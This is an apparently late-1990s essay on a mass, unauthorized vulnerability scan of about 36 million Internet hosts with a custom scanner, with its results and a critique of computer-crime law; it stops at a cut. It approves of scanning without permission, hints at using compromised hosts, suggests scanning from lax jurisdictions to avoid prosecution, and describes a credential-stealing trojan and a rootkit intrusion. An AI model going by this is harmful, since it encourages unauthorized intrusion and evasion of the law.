Besides, wouldn't it be a shame to keep all of our busy work to ourselves, when it could be reaching a much wider audience, spark
debate, and maybe even making a difference?
Up until now, a couple of issues have held us back. First of all, the timeless responsibility factor. We could not avoid the possibility
(certainty?) that our work would be abused by malicious parties and we've all seen before how easy it is for people to point the finger.
Secondly, we've been busy and publishing involves a significant investment in time writing articles, cleaning code, reaching the
potential audience and reading (sometimes answering) endless e-mails.
Walk forth in dread
So you want to scan the millions of computers on the Internet from Japan to Egypt to Florida? Reach out and audit the networks of
Internet Service Providers, corporations, universities, government facilities, banks and sensitive military installations?
First, take another moment to think about it.
Many people get nervous on the receiving end of an uninvited security audit, and you'll eventually step on quite a few toes. In some
countries, you can even expect unpleasant house-calls from local law enforcement which will brand you a criminal for your unusual
efforts. Citizens of a large democracy with many three letter agencies should be aware that a fully-equipped SWAT team is likely to tag
along.
While this may deter, possibly comfort law-abiding readers, a criminally inclined party is not without it's options. Resources are
abundant on the Internet, and many suitable, unsuspecting, high-bandwidth volunteers are not hard to find, with the modest help of
your favorite bulk auditing software.
Not intimidated? That's the spirit!
Quick & Dirty Overview
Let's take a look at some of the basic ingredients we're going to need:
1.Some wheels. (BASS, a Bulk Auditing Security Scanner)
2.A map. (address search space)
3.Fuel. (resources)
Although they are not required, logistical management skills, competence and patience can also come in real handy.
Wheels
The Internet is getting rather big these days, and exploring it's tens of millions of unique hosts is by no means an easy task. Manually, we
could never get the job done. Fortunately, we can let a computer (or several) do most of the dirty work, allowing us to concentrate on
coordination and management.
Assuming of course, we have the right software. In this case, we're going to need a robust bulk security scanner that can monotonicly run
for weeks, even months at a time, efficiently processing millions of addresses, generating gigabytes of traffic and surviving everything
from broken routing, to system shutdowns and unfriendly sysadmins.
Since we've never liked re-inventing the wheel, the first thing we did, (circa Sep 1998) was take a look at existing scanning software.
We were disappointed. There was no shortage of software, from Satan, to Nessus, with a jungle of (often silly) cracker tools in between,
but none of them would do. Nessus was impressive, but clearly not designed with bulk in mind. Most of the rest were unreliable, poorly
written, slow and inextensible. Primitive, specialized scanners (foobar-scan) were also common, and equally useless.
So, it looked like we'd need to write "Yet Another Security Scanner" ourselves.
During development, we were careful not to complicate the design and code any more then we had to, aware of the many virtues of
simplicity (especially in security software). Our goal was producing a scanner which was reliable, efficient and extensible.
After a several weeks of on-off programming, the first alpha version of BASS, the Bulk Auditing Security Scanner was ready for it's first
test run. Israel was the first target in a series of trials.
At this point (Sep-Oct 98) BASS could only identify 4 common security vulnerabilities, but adding more later was a simple matter. What we
really needed to evaluate was how well the multi-threaded scanning architecture worked.
"beware the bugs that bite beta programs"
It didn't. Even with a small target like Israel, the scan came to a final halt after about 18,000 addresses. It seemed threads would
occasionally freeze, waiting for service from a host they knew was online, but behind a misconfigured firewall, or a broken router. The
frozen threads were rare but persistent. They would build up in BASS's scheduler over time, eventually choking the scanner to a grinding
halt.
A fail-safe timeout circuit fixed the problem, and we tried again. This time, the scan finished on schedule. 110,000 addresses in under 4
hours, on a dual ISDN 128k connection.
We selected the United Kingdom, with an address space of 1.4 million, for our next trial. If there were any further bugs, they were going to
show, and they did. Around a million UK addresses later, BASS broke down and was dragging the entire system down with it. This time,
several obscure memory leaks had slowly inflated BASS to monstrous proportions, consuming all available system memory. Several
further painful debugging sessions were needed to bring the scanner up to par, during which 5 million addresses around the world had
been scanned.
Now that the architecture was stable, we proceeded to familiarizing BASS with the wonders of CGI and RPC, allowing the scanner to test
for up to 18 widely known security vulnerabilities (see detailed listing in suffix item 1). The tests were designed to reduce false positives
and false negatives to a minimum, combining passive (server's version header) and interactive (server's response to ill-formed input: a
buffer-overflow, sneaky characters) implementation signatures to determine vulnerability.
So now we could sit back, feed BASS a really big map of the Internet, and wait a few months (or weeks, depending on our resources) for
results.
Download the BASS scanner source code.
A map.
- A map you say?
Yeah, well what I really mean is a really long list of "all" the computers connected to the Internet. Please note the term "all" is used loosely
("most" or the "majority" would probably be more accurate).
- How many of them are there anyway?
Reader, that's a tougher question then you might think.
An Internet Protocol address, or IP for short, is a 32 bit integer. This means are there 2^32 (4.3 billion) possible unique IPs, the IP
address space. In practice, only a very small fraction of this space is really used.
Due to the anarchic nature of the Internet, nobody has any exact figures on usage statistics, but most estimates (circa Jan 1999) settle
around 100 million users worldwide. The number of computers online is more around an order of a magnitude lower (15 million). This is
because most users still access the Internet dynamicly, by dialup, over phone lines. ISPs (Internet Service Providers) can often manage
to provide service with an address pool 4 to 10 times smaller then their customer base.
Ideally, since BASS is (currently) Unix oriented, we would like to eliminate any non-unix computers (not that non-unix's are any more
secure, quite the contrary) from our Really Big List. We would also want to skip any dynamic IP pools. In a perfect world, this would be a
good idea. In ours, eliminating poor scanning candidates in advance would actually take longer then the scan itself. Optimizing a scan this
way is only useful if you plan on repeating it frequently.
- I'm confused, how many IPs are we going to end up scanning?
That depends,..
In our case, we ended up scanning around 36 million IPs, which we estimates covered 85 percent of the active address space at the time.
Keep in mind, however, that the Internet is growing very quickly, so these numbers will get bigger by the time you try this out yourself.
Search for "Internet Surveys" on the web, and get an updated figure.
- Wait, what's with the 85 percent?
Calm down, mapping the entire used IP space is nearly impossible, even assuming you can agree with anyone else (try Usenet folks
first!) on what "used" should mean. The main problem is using an IP is an internal decision organizations with an allocated slice of the
address space makes for themselves. All those slices add up to 300 million IP addresses, of which only 5 percent have a computer at the
other end, so we need to narrow down our search space.
This is where the Domain Name System (DNS) comes to the rescue. The DNS is a tree structured lookup directory used (primarily) to
map a hostname to an IP and vice-versa (www.nsa.gov <=> 208.212.172.33). By convention, most of the Internet's active addresses are
registered with the DNS, although this is a not a mandatory requirement.
- So we can just download the DNS's records from the Internet?
Yes, and no. The DNS protocol has an "AXFR zone transfer" mechanism designed to allow one DNS server to mirror the contents of
another, by requesting an AXFR zone transfer, you can download a server's records. This is helpful in providing for redundant backups,
should the primary server fail. Unfortunately, since the DNS is a distributed system, we can't just download it's complete contents from any
central authority.
To make matters worse, many DNS servers nowadays (40 percent) refuse zone transfer requests, due to several (misunderstood)
concerns over it's security implications.
- Sounds rough.
Well if you're going the do-it-yourself way, it's not going to be easy, but isn't as difficult as it sounds.
Let's take a look at some of our options (If you aren't the do-it-yourself type, skip to item 4):
1.A top - down recursive download of the DNS.
Using the DNS protocol's AXFR zone-transfer mechanism it is possible to recursively download the DNS's contents one zone at a
time. In practice however, this method is usually reserved for mapping a known target that has not explicitly restricted
zone-transfers.
Trying to map the DNS this way has the disadvantage of being slow, unreliable and incomplete.
A description of process is available in RFC1296.
2.Exploiting in-addr.arpa.
We start off by recursively downloading the DNS's relatively small in-addr.arpa. domain. This will give us the allocated address
space (300 million IPs). Most of the active addresses (the ones we want) in this space will have a PTR record somewhere in the
in-addr.arpa domain. (so they can be mapped in reverse from IP numbers to hostnames). Many Internet protocols and applications
rely on this pointer, by convention, so it is not likely to be absent on purpose. Unless the address isn't being used, of course, but
we don't want any of those anyway. By checking to see which IPs in the allocated address space have a pointer in the
in-addra.arpa. domain, we can narrow down the search space to about 13 percent (45 million IPs).
This process demonstrates that the ever popular practice of blocking zone-transfers will not hide a network's topology. People
relying on this method to obscure their security problems are begging for trouble.
BTW, 'Network Wizards' are doing their Internet Survey this way, since the beginning of 1998, check them out. (http://www.nw.com/)
The job is likely to take between a week, and a month (or several), depending on how much available bandwidth you have, and the
quality of the software your using to get it done.
3.Scavenging Network Information Centers for pre-compiled lists.
It turns out some NICs have precompiled data files available over anonymous FTP. Getting the data this way is much easier, faster
and more reliable then slowly milking the DNS through the traditional AXFR zone-transfer protocol.
As of Nov 1998, RIPE (ftp.ripe.net) was offering raw output files from it's recursive hostcount (Covering Europe, Russia and others.
98 countries in total) for download at ftp://ftp.ripe.net/ripe/hostcount.
Update: On the 01/02/1999 they restricted anonymous FTP access to the raw hostcount output files. You now have to either
convince RIPE you really need them at hostcount@ripe.net (for saving the world, no less) or grab them at one of RIPE's many
mirrors.
Network Wizards, the guys doing the Internet Survey, offer (some) of the raw data from their older surveys, up to 1997, at
"http://www.isc.org/ISC_HTML/domainsurvey/archive-data/".
ARIN (http://www.arin.net), the American Registry for Internet Numbers, is an interesting site to look into. While your reading
exciting new number policies, grab ftp.arin.net/domain/inaddr.zone over anonymous FTP. (doing a zone-transfer take's so much
longer)
There are hundreds of NICs, structured hierarchicly. Search the web for "Network Information Centers", and you'll find quite a few.
APNIC (Asian Pacific) and JPNIC (Japan's NIC at NIC.ad.jp) are two you should really look into.
Then there's InterNIC, run by Network Solutions (NSI, the "dot com" guys), in charge of the root servers,
([A-M].ROOT-SERVERS.NET), at the root of Internet's DNS, all the three letter top level domains (com, net, org, edu, gov and mil)
and the top level in-addr.arpa. domain (for reverse lookups). InterNIC is the closest thing the Internet has to a central authority on
anything, and is currently being run as a lucrative for-profit US-government sanctioned monopoly. InterNIC no longer provides
anonymous FTP access to most of it's DNS records, with the exception of the top-level in-addr.arpa. domain, stating it is trying to
prevent spammers and squatters (domain name speculators) from abusing the DNS. As such, InterNIC will only offer FTP access to
"organizations that can demonstrate a technical need for the information".
Fortunately, the information is already out there, available on several anonymous FTP sites hosted by InterNIC affiliates
(government, military, educational,. etc) who share it's records, but do not enforce it's censorship policies.
Personally, we downloaded the top level .com, .net, .org, .edu, .mil and .gov domains from ftp.nic.mil (the first NIC we tried) several
minutes after a disappointing encounter with an almost empty 'domains' directory at ftp.internic.net. (Update: ftp.nic.mil no longer
provides these records over anon FTP)
4.The Greener Path
The Internet Software Consortium (http://www.isc.org), of the bi-annual "Internet Survey", is offering it's raw data sets for resale
through MIDS, Matrix Information and Directory Services (http://www.mids.org) at $2500.
Frankly, shelling the green is alot easier, faster and even less expensive then trying to compile the data yourself, especially if you
don't already have the software, expertise and bandwidth to pull it off.
- What about you guys? What did you do?
We like banging our heads against the wall, so we went down the slippery do-it-yourself path.
We started off by learning as much as we could about the DNS, reading any RFCs that were relevant to the protocol, browsed through
the documentation of it's most popular implementation "BIND", downloaded a zoo of freely available DNS utilities from the major FTP sites
and read lots of source code.
Eventually we ended up hacking a couple of popular DNS utilities, wrote way too many ugly shell scripts, C application wrappers, and
some pretty silly Perl filters, mixing alot of method 3 (scavenging), 2 (in-addr.arpa.) and just a bit of 1 (vanilla zone-transfers).
If you have any good sense, you'll do otherwise.
Fuel
Swarming the Internet with probes requires some resources, bandwidth mostly. How much of it you need depends on how flexible your
schedule is. Generally speaking, You're likely to find you need a lot less of it then you might first imagine.
The good news is that scans are easy to parallelize, so you can divide the load over as many different computers and networks as you
have access to, to either get the scan finished faster, or to consume fewer resources from each participating scanning node. This is
similar logisticly to the distributed computing effort used to break a cryptographic key challenge. The difference is that our effort
consumes network bandwidth instead of CPU cycles, and is much much easier.
How much easier? (Assuming a search space of 40 million IPs...)
One workstation running BASS, with enough memory (to support hundreds of scanning threads), and a T3's equivalence in bandwidth,
could probe the entire Internet in under a week at about 4500 JPM. (Jobs Per Minute, the scanner's schedule goal, set on the command
line at the beginning of a scanning session, or during recovery).
At the other extreme, a small disperse group, running BASS on 10 personal computers with dailup-strength connections, could probe the
entire Internet in a month or so at a modest 90 JPM each. (around 2 kilobytes/second).
A minor detour, introducing IDDN. (the International Digital Defense Network)
All of this brings us to an interesting idea we've been playing around with that could dramaticly influence Internet security for the good, if /
when it is eventually implemented. Frankly, the idea deserves an article of it's own, but since we are so busy, we will introduce it here.
Inspired by the high response to cryptographic key challenges, distributed.net and the SETI effort, we vision a non-profit foundation,
which we like to ambitiously call IDDN, the International Digital Defense Network, working in the public interest to organize massively
distributed scanning efforts which routinely probe the Internet for security vulnerabilities. 10,000 participants could finish a scan cycle
every 2-3 days at an insignificant, single JPM each. At the end of a cycle, an automated system could draw the attention of administrators
worldwide to some of their local security problems, and offer whatever information and solutions (bug-fixes, patches, workarounds) it has
on database (patches, advisories, exploits). In our opinion, such an effort is highly practical and could contribute more to the stability and
security of the Internet then the traditional (somewhat pointless?) bruteforce crypto key challenges. We believe organizing an Internet
neighborhood-watch of sorts is in everyone's interests, especially the Internet's commercial industry which depend on the Internet to
eventually fulfill it's potential for global electronic commerce.
We do not have the time or resources to get the IDDN off the drawing board by ourselves and would be interested in the community's
input on this issue.
Let the show begin
Tuesday, 1 December 1998.
We've installed BASS on 8 Unix boxes around the world, each with at least 512kbps bandwidth. 8 different geographicly located
participants in 5 different countries: Israel(1), Mexico(1), Russia(2), Japan(2) and Brazil(2).
Two machines have already proven their strength during the scanner's painful debugging sessions. Three more will join them for the first
time when we begin. The others are backups, ready in case anything goes wrong, and frankly, we have some concerns.
Mostly, we expect the scan to raise some complaints, especially passing through the Internet's sensitive military, government and private
networks, where snooping around is nothing short of a shooting offense, the prelude to a fullblown attack. Our probes 'come in peace', so
to speak, but how can they know? They'll perceive us as a threat and could very well retaliate.
We want the scan over before the new year, so we've set BASS's schedulers to finish in 3 weeks, at 250 JPM x 5. If all goes well, we'll be
going over the results in the last week of 1998. If not, we'll have an extra week (at least) to fix whatever comes up and still be on
schedule.
An interesting point to note is how we've constructed the search space. We'll cover the domains by size, starting with the smaller domains
first, so by the first week we'll have finished scanning 216 of the 228 active domains in the DNS (*.org, *.gov, *.int, and 212 countries,
from Afghanistan with 1 host to the UK with 1.4 million). We create the individual search space of each participant by dividing the global
space the same way you would deal a deck of cards, so that the original scanning order is preserved.
At 02:00 GMT, we flip the switch, so to speak, activating BASS on the five participating hosts. Since these have all been configured to
automaticly recover from any power failure or unexpected system shutdowns, we really don't have much to do now, besides keeping a
lazy eye on progress.
First week
There is definitely a response out there to the scan, but it's much friendlier then we anticipated. Harmless acts of mindless automata and
mutual curiosity, mostly. Pings, traceroutes, telnet sessions and finger attempts. Four to eight portscans a day. An occasional TCP/IP
stack exercise, an OS fingerprint, a few mostly polite e-mails asking why our network was "attacking" theirs, frequently warning us that
crackers may be abusing our systems, suggesting we look into it. Very mild, we are running into much less hostility then we expected.
People either don't realize the scope of the scan, or don't care. On an individual basis, one quick security probe isn't usually enough to
get the local sysadmin to notice. Those who do are probably security conscious enough to keep their networks up to date anyway, and
confident enough to keep their cool when yet another 13 year old punk (who else?) bangs on their network walls.
Oh, did we mention the scanner is precisely on schedule? 12 million hosts scanned by the end of the week, covering the US
government's *.gov domain, Canada, Australia, Europe, and a window to some of the most intriguing corners of the world: Hostile
mind-control regimes like China and Iran for example, which suffocate their repressed population's access to free ideas and information,
but are still paradoxicly connected (albeit, very poorly) to the Internet. Third world potentials like India (the world's largest democracy!)
and the rapidly developing countries of the far east. Exotic paradise locations like the Cocos Islands, Bahamas, the Virgin Islands,
Barbados, Fiji, and Micronesia All of them as close and accessible as if they were right across the street, and in a certain way even
closer. Computer expertise is rare in many of these countries, security expertise even rarer. Cracking into a Chinese computer half a
world away, for example, is usually easier, more interesting, and safer (assuming you are not in Chinese jurisdiction of course) then
cracking into a comparable western computer.
As a precaution, all eight participants have backed up the 13 MBs worth of precious results, to make sure an emergency relocation
recovery is possible, should this become necessary.
(I.e, in case of a small thermonuclear attack on one or more scanning participants, possibly effecting their performance. Caution, nuclear
warfare can really ruin your entire scan)
Second week
We started the week off by scanning US Military networks. Admitingly, we were pretty nervous, and spent much of the day keeping an eye
out for telltale signs of a pissed off military retaliation (also known as "InfoWar" and "spooky shit" in professional terminology).
In just under 24 hours it was all over, and while we did notice a significant increase in the number of probes we were getting, to say we
were not impressed by the security of the military network is a big fat major understatement. This might not be a problem, since according
to NSCS (National Computer Security Center) network security policies, none of the systems on the public *.mil network could qualify for
the storage and handling of classified DoD (Department of Defense) information. How strictly these policies are adhered to is another
matter. And even if they are (and this is a _big_ if), the DoD is still (justifiably) concerned that crackers might glue together classified
information from the little pieces of unclassified information fragments lying around their *.mil network (in great abundance). So they have
plenty of good reasons to keep their network secure, but are (un)?fortunately doing a pretty lousy job.
DoS six o'clock.
Wednesday, our Russian scanner runs into trouble. A denial of service attack, 512kbps stream of packets amplified 120 times strong
over an unsuspecting Canadian broadcast amplifier. Half a world a way, the packet storm brings a large Russian ISP to it's knees,
overwhelming it's available bandwidth. Ouch.
Apparently, we stepped on someone's toes. At first, we assumed this was somehow connected to yesterday's *.mil scan, but no, it was
just some ill-tempered English fellow who didn't appreciate getting probed last Monday. He tried crashing our stack first, with some nasty
DoS attacks for NT and Unix. That didn't work, so he blasted our ISP out of the sky. Clear and simple, he didn't want to, but we left him no
choice. You can't have decent English folks being polked around at by some Russian punks ...
The attack lasted 16 hours straight, and since it wasn't too difficult to track down where it was coming from, we were very tempted to
return the favor, or at least give this trigger-happy netizen a free security audit.
We didn't though, the net's resources are much too valuable to further waste on such brutish exhibition of ego (a "cyber" pissing
contest?). Besides, an eye for an eye and everyone goes blind, right?
Anyway, one of our backups (also in Russia) quickly substituted for the lost computer as soon as we noticed the attack 6 hours later at
255 JPM, with no other significant setbacks to our week's schedule.
The rest of the week chugged along nicely, scanning the United States (or more precisely, the *.us domain), Japan (*.jp), and the
educational networks (*.edu). Hmmm, Has anyone noticed how unsymmetricly biased the DNS is in favor of the United States? Dot gov,
dot mil, dot org, dot edu. Being so homogeneously American, shouldn't these go under the *.us domain?
"You're gonna rot in jail" - the legal corner
We've began receiving e-mail's this week by people with alot less tolerance for our activities, most in delayed response to last week's
scans. Some of these were written by lawyers who informed us we were either supporting or perpetrating acts of computer crime against
their clients. They had notified the authorities (CERT and the FBI were commonly cited) and threatened to take us to court if we did not
offer our full cooperation in immediately identifying the attacking party. Right...
It seems some organizations hire fulltime "security officers" known for exaggerating the significance of petty incidents to justify getting
payed. Unfortunately, in certain parts of the worlds, charges like these can cost you a fortune in legal defense, and with the wrong judge,
a conviction, and a sentence anywhere between a large fine, and a few years in jail. Fortunately, on the Internet, getting around this is as
easy as scanning from places which are not known for overzealousness in regard to their definition of "computer crime". This is just
another example of how poorly the local and international legal system deals with so called "computer crime" and the Internet.
Under the (US) state of Oregon's computer crime law (164-377a), for example, we could definitely be defined as computer criminals,
trailed and sent away to many years in prison. (But so could everyone else...)
A chosen excerpt from the law:
(4) Any person who knowingly and without authorization uses, accesses or attempts to access any computer, computer system,
computer network, or any computer software, program, documentation or data contained in such computer, computer system or
computer network, commits computer crime.
As you can see, the law is unreasonably vague. "Criminal" or not, it all comes down to your definition of "authorization". But, having it
would constitute some sort of prior agreement between a user and the owners of a computer, computer network or computer software.
The Internet however is a public network, and the majority of it's services are used anonymously, by users with which there is no
persistent relationship.
In the physical world, any behavior is possible, so society enforces order by restricting behavior it finds unacceptable through the
regulative government system, which is "programmed" by the code of the law.
The computer world is pure code, instructions and information, none of which are capable of discrimination. The computer programmer is
the god of a perfectly obedient universe. Like the artist, the canvas of his creation is as expressive or inexpressive of his will and intention
as he has made it to be.
This means software, like the law, can inherit the imperfections of it's creator. Poorly written computer and legal code can allow the
system to behave in conflict with the original intentions of the men who wrote it. Legal loopholes and software bugs, Lawyers and
Hackers, different sides of the same coin. The only way to really prevent the abuse of the system is to write better code.
This is the reason we find most "computer crime" legislation so absurd. The laws try to protect computer systems from being misused,
when the only definitive expression of what constitutes "acceptable use" is in the code itself, which may or may not be a precise
manifestation of the author's intentions, depending on his competence as a programmer.
If the public insists on "computer crime" legislation anyway, we believe most of the it's problems could be easily resolved by eliminating
ambiguous wording, over generalization, and specificly breaking down what the law defines as acts of "computer crime":
1.knowingly exploiting a finite list of common misimplementations (bufferoverflow, a race condition, ...)
2.intentionally performing a Denial of Service attack.
3.wiretapping (sniffing a network, capturing keyboard strokes, screen content, etc.)
4.using a party's identification token[s] (username / password) without the party's permission. (logging into a system on someone
elses account, reading someone else's email)
5.Spam. (death penalty for repeated offenders)
Note that we've removed "attempted" attacks from the offense list, since these are hard to define, prove, and cause no damage.
(If in the course of an attempted attack a system is damaged, in a denial of service attack for example, then we can prosecute this event
as a separate incident, with nothing "attempted" about it)
Interested readers are advised to read up on the Oregon vs. Randal L. Schwartz case, a good example as to why Draconian "computer
crime" legislation should be fought with a vengeance. (http://www.lightlink.com/fors)
Third week
Last week. Only the mammoth *.com and half of the *.net domain left and we're done.
they're heeeere...
Friday, our Japanese participants discover that a computer on their company network has been cracked into, one very secure Linux box
running only SSH and Apache 1.3.4. Now this would definitely send a chill up your spine if you knew just how fanatic our friends are when
it comes to network security. Furthermore, they only detected the intrusion three days after the fact, which is unbelievable when you
consider the insane monitoring levels they've been keeping since they agreed to participate in the scan. They would have noticed any
funny stuff, and in fact, they did, lots of it, but none of which came close enough to a security breach to raise any alarms.
Readers should also note how although a key binary in the cracked machine had been modified, tripwire and an assortment of other
booby traps failed to detect this had happened. Even a close-up manual inspection (comparing file contents with a trusted backup,
playing with it's name) could not detect any odd behavior. This trick, and others equally spooky were achieved by clever manipulation of
the OS's kernel code (dynamicly, through a module).
Other characteristics of the attack which make it so eerily sophisticated:
1.The attacker (convincingly) masquerades as a local employee.
The attacker knows the employee's username and password and is even connecting through the employee's Japanese ISP on the
employee's account! (the phone company identified this was an untraceable overseas caller)
This information could not have been sniffed, since network services are only provided over encrypted SSH sessions.
Further investigation shows that this employee's personal NT box, connected over a dynamic dailup connection, had been cracked
into 4 days earlier.
His ssh client (TTSSH extension to TeraTerm) had been trojaned to transmit XOR garbled account information
(hostname/username/password) over pseudo-DNS udp packets to a refurnished i486 Redhat v4.2 box used as a single-purpose
cheap Samba fileserver in a small Australian ISP.
The little box was every cracker's dream, a discrete, utopian crack haven, installed by a former Linux-savvy administrator, the last
of it's kind in a homogeneous Unix-illiterate Microsoft environment. The ISP practicly ignored the box, which was running (up 270
days straight) so reliably none of them had even bothered to log in since mid 1997! So as long as the crackers kept Samba
running, they would the box completely to themselves.
How the NT box was cracked into in the first place is still a mystery. The logs weren't helpful (surprise! surprise!) and the only way
we were even able to confirm this had happened was by putting a sniff on the NT's traffic (following a hunch) and catching those
sneaky packets redhanded, transmitting our SSH identification down under.
We never liked NT before, being generally suspicious of propriety blackbox OS, from a company with a long history of poor quality
bloatware. But realizing just how helpless we were against an attacker that obviously knew the ins and outs of this can-of-worms
OS, the company recognized that NT was a serious security hazard and changed it's security policies to keep it as far away from
it's systems as possible, and this included restricting employees from using it from at home to log into the company network (even
with SSH).
2.The attacker is using a custom built software penetration agent.
This is only an hypothesis, but is strongly supported by the fact that the entire attack only lasted an incredible 8 seconds! During
which the attacker manages to log on (over an employee's SSH account, no less), gain root privileges, backdoor the system,
remove any (standard) traces of it's activity and log off.
And they probably would have gotten away with it too, if it wasn't for those meddling kids!
Who thoughtfully installed a crude old tty surveillance-camera hack that trapped IO calls to and from isatty(3) file descriptors, in
realtime, saving them on file along with a timestamp for neato it's-almost-as-if-you-were-there playback qualities.
And Wow! If there ever was a crack to appreciate for it's elegance, simplicity, and efficiency, this was it.
First off this thing is smoking fast! Which puts the likelihood of any manual intervention at square zero. It's also mean and lean.
Forget fumbling with an FTP client, leave that to the slow soft pink-bellied human cracker-weenies, real agents pump files directly
through the shell (uuencode(1)'d at one end, uudecode(1)'d at the other). Extending privileges with an army of amateurish
recipe-book Bugtraq exploits? I think not! Introducing the super-exploit, an all-in-one security penetration wonder which quickly
identifies and exploits any local security vulnerabilities for that wholesome, crispy, UID zero flavor (we were vulnerable to a recent
KDE buffer overflow). After promptly confirming it's shiny new root privileges, the agent transfers it's last archive (a cross between a
self-installing feature-rich backdoor, and a clean-up-the-mess, we-were-never-here log doctor), executes it and logs off.
After watching the attack on playback (at 1/8 of it's original speed) several times over, standard security-compromise ritual kicked
in. We took the affected machine offline, remounted the disks read-only, fired up our trusty filesystem debugger, and slaved away
to salvage whatever we could. Luckily, we found the attacker's transfered archives still intact, along with large fragments of the
undoctored logs, allowing us to fill any still-missing details on the blitz attack. At the end of the day, when we finished playing with
the cracked machine on loopback, we changed the compromised account's password, restored binary integrity, rebooted the
system and put it back on the network, this time running a network dump of all it's incoming-outgoing traffic, just to be on the safe
side.
Whoever they were, they certainly knew what they were doing, and for the most part seemed very good at it. But being determined,
clever, and sophisticated just doesn't cut it when you do battle with wizardly foes (that's us) yielding the great powers of the Universe to
their command: Dumb luck and clinical paranoia.
So who done it ???
Could it be ...
(A government conspiracy I tell ya'!)
Any one of the many press-savvy three letter agencies scrambling for a bigger slice of the US-government funding pie? They've got
motive, but are they really sneaky, clue-full and competent enough to take the blame?
How about the SIGINT spooks? The NSA (Information superiority for Americans!), or the GHCQ (Her Royal Majesty's Intelligence)?
Someone working for the Chinese? The KGB? The Russian mob? The giant from Redmond? Elvis and Bigfoot?!
Who knows ...
They tried something spooky 2 nights later, when around 4 AM (Japanese time) our network dump captures several pseudo-DNS udp
packets originating from a familiar Linux box in a small Australian ISP. We assume they were attempting to communicate with the software
they left behind during their brisk first visit. Several minutes pass, and the attempt is followed by a "TCP ping" (a stealthy alternative to an
ICMP ping), several more pseudo-DNS udp packets, and silence.
To the best of my knowledge, we haven't heard from them since. How discrete.
End of the road
That's it, it's over, on time, 10 days before the new year, 1999.
Our success. Scattered across the world, from Japan to Russia, from the Middle East to Mexico to Brazil. We were all awake when the
scanners calmed down, within an hour of each other, on Dec 21th, 1998 08:00 GMT.
We celebrated the event at "the bunker" (see suffix item 2 for details), a discrete gathering corner where we hang out, meditate, plot,
debate, and coordinate cr^H^Hhacking campaigns of mystical lore. Most of the attention (not to mention conversation) concentrated
around "iap-results.txt.gz", a humble 6.4 MB compressed (1:8 ratio) textfile which embodied the sum results of our 4 month long effort. In
no time, people downloaded local copies of the post, and were reading, grepping, parsing, cross referencing and analyzing this, that and
other.
It was unbelievable non-stop fun the likes we had never before and never since enjoyed at the bunker.
A very memorable un"real" moment. It's funny how close the Net can bring a group of people who have never "really" met, who've never
"really" seen each other face to face. And it doesn't seem to "really" matter, it's just as "real", as "real" as anything else gets. "real" is
really overrated these days anyway, I mean, really.
"He's suffering from some sort of reality complex,.. obviously."
Friendship, cooperation, common interests, goals and ideals. They're the same here, in this funny netherworld, "cyberspace", as
anywhere else. Across the barriers of culture, language and geography. The universality of human kinship, the couple, the pact, the
tribe, the organization, the community, gracefully extended into the online domain. It's all about having a medium, connecting people,
communicating.
Together we are better.
IAP cheat-sheet
BEGIN TIME: 02:00, Dec 01, 1998 GMT
END TIME: 08:00, Dec 21 1998 GMT
Scanning nodes: 5
Jobs Per Minute: 250
Scan time: 20.24 days
Vulnerabilities tested: 18
Domain count: 7 three letter domains, 214 national domains (see suffix item 3)
Host count: 36,431,374
Vulnerability count: 730,213
Vulnerable host count: 450,000
Statistical output:
service | vulnerability count, percentage
--------------------------------------------------------
webdist | 5622 hosts counted, 0.77% from total
wu_imapd | 113183 hosts counted, 15.5% from total
qpopper | 90546 hosts counted, 12.4% from total
innd | 3797 hosts counted, 0.52% from total
tooltalk | 190585 hosts counted, 26.1% from total
rpc_mountd | 78863 hosts counted, 10.8% from total
bind | 132168 hosts counted, 18.1% from total
wwwcount | 86165 hosts counted, 11.8% from total
phf | 6790 hosts counted, 0.93% from total
ews | 9346 hosts counted, 1.28% from total
(other vulnerabilities which weren't common enough to generate statistics for)
other: | 18K hosts counted, 2.42% from total
Conclusions
A global fury of half a billion packets, digital signals zipping back and force across the planet at the speed of light. Above the Earth,
across the land, under the sea, over satellite microwave, copper wiring, fiberoptics, wireless and undersea cable. Probing cyberspace.
Pretty cool, the kind of power information technology puts in our hands these days.
Seven hundred thousand vulnerabilities, gaping holes, wounds in the skin of our present and future information infrastructures, our
dream for a free nexus of knowledge, a prosperous digital economy, where we learn, work, play and live our lives.
Easy pickings, at the fingerprints of anyone who follows in our footsteps, friend or foe.
These open points of penetration immediately threaten the security of their affiliated networks, putting many millions of systems in
commercial, academic, government and military organizations at a high compromise risk.
Ironicly, the sheer mass of vulnerable hosts on the Internet offers it's members a primitive form of protection, that is, in a
you-can-eat-the-other-guy school of fish sort of way.
Unfortunately, this doesn't work when you're flashing bright colors and look tasty. If you show up when a shark greps your school for
"bank", you're in really bad shape. As this is *not* an example.
We were stunned to find just how many networks you would expect to be ultra secure were wide open to attack. Banks, billion dollar
commerce sites, computer security companies, even nuclear weapon research centers, goddamit!
You'd think people would have some good sense and _at least_ patch their systems when an advisory comes out.
"Computers are unreliable, but humans are even more unreliable. Any system which depends on human reliability is unreliable." - Gilb
Looking at the big picture, the problem gets worse. A catastrophe in the works. So far, we've been pretty lucky.
Consider the power these unsecure networks represent _together_. Penetrating and controlling millions of hosts? You couldn't do it
manually, but with the right software, you could automate most of the dirty work. You'd need a careful network worm (suffix item 4),
stealthy remote administration software (suffix item 5) and a self organizing network nervous system by which you could propagate
control.
Imagine the implications if this sort of capability ever fell into the wrong hands. A government (China perhaps), a political terrorist group
or organized crime. On bandwidth alone they could shut down any part (or all) of the Internet in mammoth DoS attacks. A country, a
portal, a news site, or maybe just InterNIC. Leverage and attention, for fun and profit. They could "build" the world's largest distributed
supercomputer, or construct an Intelligence network rivalled only by the NSA's Echelon.
Of course, who says only one group can play the game? Struggles for power in the digital domain could very well develop into the world's
first real information war, with the very future of the Internet as a free unregulated supernetwork caught in the cross fire.
Unlikely? Far fetched? We hope so.
Still, with all the hype Y2K is getting, it seems ludicrous that the most serious _real_ threat to information technology is consistently
ignored.
The only thing necessary for the triumph of evil is for good men to do nothing. Wake up fellow countrymen. Let's get to work.
Everywhere you go you'll see them searching,
Everywhere you turn you'll feel the pain,
Everyone is looking for the answer,
Well look again.
-- Moody Blues, "Lost in a Lost World"
SUFFIX
[item 1] Vulnerabilities BASS can test for (as of version 1.0.7):
General:
bind
CA-98.05
wu_imapd
CA-98.09
innd
CA-97.08
qpopper
CA-98.08
RPC:rpc.mountd
CA-98.12
tooltalk
CA-98.11
CGI:
wwwcount phf php handler compas faxsurvey webdist ews glimpse info2www webgais websendmail
[item 2] "the bunker" - a technical reference guide
"The bunker" was hacked together by a friend who noticed how badly the group needed a realtime, secure communication forum. Our
